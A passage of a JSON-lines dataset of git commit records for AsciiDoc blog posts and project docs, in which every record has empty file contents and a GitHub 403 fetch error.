403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8778ee7e88446097e1d02937a896d389a0240cf","subject":"Update 2015-02-13-Cocoa-chan.adoc","message":"Update 2015-02-13-Cocoa-chan.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-02-13-Cocoa-chan.adoc","new_file":"_posts\/2015-02-13-Cocoa-chan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ee73800916472ec13a7e0fecbcd8c9230f72ce","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc9ad4ec7f1509b543f2d821f3eeb8723c36d00b","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97fb04648c48d800efdaec10e5ac15a5128d3016","subject":"Renamed '_posts\/2017-08-17-IDE.adoc' to '_posts\/2017-08-17-Speedy-IDE.adoc'","message":"Renamed '_posts\/2017-08-17-IDE.adoc' to '_posts\/2017-08-17-Speedy-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f998ddd71b31c4c331bf956372f17d9046c796fc","subject":"Update 2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","message":"Update 2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","new_file":"_posts\/2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04d431551fe4668ed7a868027d90347e2268ef88","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2fa1ab06eca2d21398dba3a2ac8646cec5a80cc","subject":"Update 2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","message":"Update 2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","new_file":"_posts\/2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce16e7569944e775a12e912fc0094d259f313a3","subject":"Update 2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","message":"Update 2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","new_file":"_posts\/2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fb15f73c2ab31ea0b9ab031ee30f0c7f34485c2","subject":"Update 2009-04-25-XML-binding-with-JAXB-13.adoc","message":"Update 2009-04-25-XML-binding-with-JAXB-13.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-25-XML-binding-with-JAXB-13.adoc","new_file":"_posts\/2009-04-25-XML-binding-with-JAXB-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda9ea5882389bcfec2d99883236b9d57305c15d","subject":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5b3a4de4978b5e53d7b6a7c143823fee60a97d2","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f7fbb714217207d3aaefbf102085793ae637a4","subject":"Update 2016-08-27-Laravel-52-basic-auth.adoc","message":"Update 2016-08-27-Laravel-52-basic-auth.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-27-Laravel-52-basic-auth.adoc","new_file":"_posts\/2016-08-27-Laravel-52-basic-auth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84665ed713cf559e4565ede8325c156e049f7418","subject":"Update 2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","message":"Update 2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","new_file":"_posts\/2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1119a1828567e43db31b9a39d56cd0fe93ffa3c3","subject":"Create jql.adoc","message":"Create jql.adoc","repos":"tripattern\/howtos,tripattern\/howtos,tripattern\/howtos","old_file":"atlassian\/jql.adoc","new_file":"atlassian\/jql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tripattern\/howtos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"314dbd1d9dcf12834701e6790111dd3f8e4f2c0b","subject":"Add a few words about the current features","message":"Add a few words about the current features\n","repos":"archiloque\/external-memory,archiloque\/external-memory,archiloque\/external-memory","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/archiloque\/external-memory.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d8c4dc7aee984521f4fc1eefb0a8ddd96928e1e","subject":"Create initial README","message":"Create initial README","repos":"clyfe\/twixt,AvisoNovate\/twixt,AvisoNovate\/twixt,clyfe\/twixt,clyfe\/twixt,AvisoNovate\/twixt","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clyfe\/twixt.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10def5964a6c0f99fd38230e1a66b899d3233656","subject":"Update 2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","message":"Update 2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","new_file":"_posts\/2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0a5006d126117d7083f6bd8eeb5a75c4c092510","subject":"Update 2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","message":"Update 2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","new_file":"_posts\/2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdb3e4604bdd13242b52b813289cf630478a3eeb","subject":"Update 2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","message":"Update 2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","new_file":"_posts\/2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac78949d209f8b25e2737bace2ca185596ee3e52","subject":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f810ac9722f4d3e28d3fe997833e7e07011ca839","subject":"y2b create post This Is Probably A Bad Idea...","message":"y2b create post This Is Probably A Bad Idea...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-23-This-Is-Probably-A-Bad-Idea.adoc","new_file":"_posts\/2017-02-23-This-Is-Probably-A-Bad-Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f4ab6570f5d95b3e6b9035f3903788c4edc921","subject":"0.8.2 release announcement","message":"0.8.2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-08-30-debezium-0-8-2-final-released.adoc","new_file":"blog\/2018-08-30-debezium-0-8-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7b9ce7dfd9d26d8bc96e2d646dc5d39daf228ad","subject":"Adds information to reference links.","message":"Adds information to reference links.\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b545e190e705b3cca7a43f9027a4251a7e1856f3","subject":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","message":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de1de623fe5402ae2f50f754a1c5834e5ffb72fc","subject":"Update 2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","message":"Update 2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4704b567f0fc71edae165ed2c6a98d6b1d105d1","subject":"Update 2017-11-12-Sili-Play.adoc","message":"Update 2017-11-12-Sili-Play.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-11-12-Sili-Play.adoc","new_file":"_posts\/2017-11-12-Sili-Play.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2687f478e149ab4f8ad8e9c60c3c483ab2135b5","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-23-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dba44167574855e88ff12074c8134b4e2e1a1cd","subject":"[docs] - Impala doc - partitioning required","message":"[docs] - Impala doc - partitioning required\n\nIt seems a blurb in the impala page got missed when partitioning\nbecame required on table create. Updated verbiage without removing\nreference links.\n\nChange-Id: I022b49c4e0b17031b9f14648ef0216ba0094b92b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4595\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"442ff0307c30f8a82efd5c5306491d7a28f676fe","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"332f4acc2cd030e98ec9c1f96f06a836a63695cb","subject":"Update 2016-02-10-Bae.adoc","message":"Update 2016-02-10-Bae.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-Bae.adoc","new_file":"_posts\/2016-02-10-Bae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803e8c54e4c35077c043c6af4dd4b1b6320177f7","subject":"Updated doc\/Z-PLUGINS.adoc","message":"Updated doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c2cc00524f17df456c14b4d1a7b94552e62711e","subject":"Publish asfgsdfg-markdown-test-2.adoc","message":"Publish asfgsdfg-markdown-test-2.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"asfgsdfg-markdown-test-2.adoc","new_file":"asfgsdfg-markdown-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915d51b1200ef7a2298cd9eb086f1f70c86d47c2","subject":"formatting section titles","message":"formatting section titles","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e42c2da02b05e899f07c246bf7e40bb058f5bbe9","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c36bb222fbc25ddbe303f27661b01efc366d148c","subject":"Fix #1100 (#1101)","message":"Fix #1100 (#1101)\n\n* Fix #1100\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #1100\r\n\r\nedit phrasing\r\n\r\n* Fix #1100\r\n\r\nedit getBoolean","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f754c96a7bd3d9ea25c119ef05edaf1d7b6c46f4","subject":"Update 2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","message":"Update 2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","new_file":"_posts\/2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d66de3f6669fee0e4d5b2720e71057070e815b5","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329975e921c3a6be08d6223615d641f6f8c159ed","subject":"Update 2017-08-08-adjmotion.adoc","message":"Update 2017-08-08-adjmotion.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-adjmotion.adoc","new_file":"_posts\/2017-08-08-adjmotion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"571d2ea09dbda95c51e03b46afc2f7e39963cad9","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89d08a01860901ce2532e26f341ba9997ebef8ef","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"281c8489b468fef6edba1ca544582c4290001bda","subject":"Update 2017-03-22-El-primer-post.adoc","message":"Update 2017-03-22-El-primer-post.adoc","repos":"thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io","old_file":"_posts\/2017-03-22-El-primer-post.adoc","new_file":"_posts\/2017-03-22-El-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thefreequest\/thefreequest.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0110a52877458b8812a548dcf643c69ec29ce78","subject":"2016-07-18-moretrees.adoc","message":"2016-07-18-moretrees.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-moretrees.adoc","new_file":"_posts\/2016-07-18-moretrees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 